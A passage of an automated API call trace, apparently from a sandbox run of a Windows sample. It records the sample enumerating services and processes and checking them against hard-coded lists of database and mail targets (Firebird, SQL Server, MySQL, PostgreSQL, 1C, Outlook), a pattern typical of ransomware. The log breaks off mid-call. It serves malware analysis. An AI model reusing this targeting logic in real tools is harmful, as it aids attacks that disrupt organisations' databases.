pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0240.275] GetLastError () returned 0xea [0240.275] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa08) returned 0xba5e18 [0240.275] EnumServicesStatusExW (in: hSCManager=0xb84560, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xba5e18, cbBufSize=0xa08, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xba5e18, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0240.275] CloseServiceHandle (hSCObject=0xb84560) returned 1 [0240.276] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0240.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0240.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0240.276] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0240.276] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0240.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0240.276] lstrlenW (lpString="AudioSrv") returned 8 [0240.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0240.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0240.276] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0240.276] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0240.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0240.276] lstrlenW (lpString="BFE") returned 3 [0240.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0240.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0240.276] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0240.276] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0240.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0240.276] lstrlenW (lpString="CscService") returned 10 [0240.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0240.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0240.276] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0240.276] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0240.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0240.276] lstrlenW (lpString="DcomLaunch") returned 10 [0240.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0240.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0240.277] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0240.277] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0240.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0240.277] lstrlenW (lpString="Dhcp") returned 4 [0240.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0240.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0240.277] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0240.277] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0240.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0240.277] lstrlenW (lpString="Dnscache") returned 8 [0240.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0240.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0240.277] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0240.277] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0240.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0240.277] lstrlenW (lpString="eventlog") returned 8 [0240.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0240.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0240.277] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0240.277] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0240.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0240.277] lstrlenW (lpString="EventSystem") returned 11 [0240.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0240.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0240.278] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0240.278] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0240.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0240.278] lstrlenW (lpString="gpsvc") returned 5 [0240.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0240.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0240.278] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0240.278] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0240.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0240.278] lstrlenW (lpString="lmhosts") returned 7 [0240.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0240.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0240.278] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0240.278] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0240.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0240.278] lstrlenW (lpString="MMCSS") returned 5 [0240.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0240.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0240.278] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0240.278] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0240.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0240.278] lstrlenW (lpString="nsi") returned 3 [0240.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0240.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0240.279] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0240.279] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0240.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0240.279] lstrlenW (lpString="PlugPlay") returned 8 [0240.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0240.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0240.279] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0240.279] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0240.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0240.279] lstrlenW (lpString="Power") returned 5 [0240.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0240.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0240.279] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0240.279] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0240.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0240.279] lstrlenW (lpString="ProfSvc") returned 7 [0240.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0240.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0240.279] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0240.279] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0240.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0240.279] lstrlenW (lpString="RpcEptMapper") returned 12 [0240.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0240.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0240.279] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0240.279] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0240.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0240.280] lstrlenW (lpString="RpcSs") returned 5 [0240.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0240.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0240.280] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0240.280] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0240.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0240.280] lstrlenW (lpString="SamSs") returned 5 [0240.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0240.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0240.280] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0240.280] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0240.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0240.280] lstrlenW (lpString="Schedule") returned 8 [0240.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0240.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0240.280] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0240.280] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0240.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0240.280] lstrlenW (lpString="SENS") returned 4 [0240.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0240.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0240.280] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0240.280] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0240.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0240.281] lstrlenW (lpString="ShellHWDetection") returned 16 [0240.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0240.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0240.281] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0240.281] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0240.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0240.281] lstrlenW (lpString="Spooler") returned 7 [0240.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0240.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0240.281] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0240.281] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0240.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0240.281] lstrlenW (lpString="Themes") returned 6 [0240.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0240.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0240.281] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0240.281] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0240.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0240.281] lstrlenW (lpString="UxSms") returned 5 [0240.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0240.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0240.281] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0240.281] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0240.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0240.282] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xba5e18 | out: hHeap=0xb00000) returned 1 [0240.282] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x120 [0240.283] Process32FirstW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.283] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0240.284] lstrlenW (lpString="System") returned 6 [0240.284] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0240.284] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0240.284] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0240.284] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0240.284] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0240.284] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0240.284] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0240.284] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0240.284] lstrlenW (lpString="smss.exe") returned 8 [0240.284] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0240.284] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0240.284] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0240.284] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0240.284] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0240.284] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0240.285] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0240.285] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0240.285] lstrlenW (lpString="csrss.exe") returned 9 [0240.285] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0240.285] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0240.285] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0240.285] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0240.285] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0240.285] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0240.285] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0240.285] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0240.286] lstrlenW (lpString="wininit.exe") returned 11 [0240.286] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0240.286] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0240.286] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0240.286] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0240.286] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0240.286] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0240.286] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0240.286] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0240.286] lstrlenW (lpString="csrss.exe") returned 9 [0240.286] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0240.286] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0240.286] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0240.286] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0240.286] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0240.286] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0240.286] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0240.287] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0240.287] lstrlenW (lpString="winlogon.exe") returned 12 [0240.287] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0240.287] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0240.287] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0240.287] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0240.287] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0240.287] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0240.287] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0240.287] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0240.287] lstrlenW (lpString="services.exe") returned 12 [0240.287] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0240.287] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0240.287] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0240.287] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0240.288] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0240.288] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0240.288] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0240.288] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0240.288] lstrlenW (lpString="lsass.exe") returned 9 [0240.288] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0240.288] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0240.288] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0240.288] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0240.288] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0240.288] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0240.288] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0240.288] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0240.288] lstrlenW (lpString="lsm.exe") returned 7 [0240.288] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0240.288] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0240.289] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0240.289] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0240.289] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0240.289] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0240.289] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0240.289] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.289] lstrlenW (lpString="svchost.exe") returned 11 [0240.289] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0240.289] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0240.289] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0240.289] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0240.289] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0240.289] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0240.289] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0240.289] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.289] lstrlenW (lpString="svchost.exe") returned 11 [0240.289] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0240.290] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0240.290] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0240.290] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0240.290] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0240.290] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0240.290] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0240.290] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.290] lstrlenW (lpString="svchost.exe") returned 11 [0240.290] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0240.290] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0240.290] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0240.290] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0240.290] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0240.290] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0240.290] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0240.290] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0240.291] lstrlenW (lpString="LogonUI.exe") returned 11 [0240.291] lstrcmpiW (lpString1="1c8.exe", lpString2="LogonUI.exe") returned -1 [0240.291] lstrcmpiW (lpString1="1cv77.exe", lpString2="LogonUI.exe") returned -1 [0240.291] lstrcmpiW (lpString1="outlook.exe", lpString2="LogonUI.exe") returned 1 [0240.291] lstrcmpiW (lpString1="postgres.exe", lpString2="LogonUI.exe") returned 1 [0240.291] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="LogonUI.exe") returned 1 [0240.291] lstrcmpiW (lpString1="mysqld.exe", lpString2="LogonUI.exe") returned 1 [0240.291] lstrcmpiW (lpString1="sqlservr.exe", lpString2="LogonUI.exe") returned 1 [0240.291] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.291] lstrlenW (lpString="svchost.exe") returned 11 [0240.291] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0240.291] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0240.291] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0240.291] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0240.291] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0240.291] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0240.291] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0240.291] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.292] lstrlenW (lpString="svchost.exe") returned 11 [0240.292] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0240.292] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0240.292] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0240.292] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0240.292] lstrcmpiW (lpString1="mysqld-nt.exe", 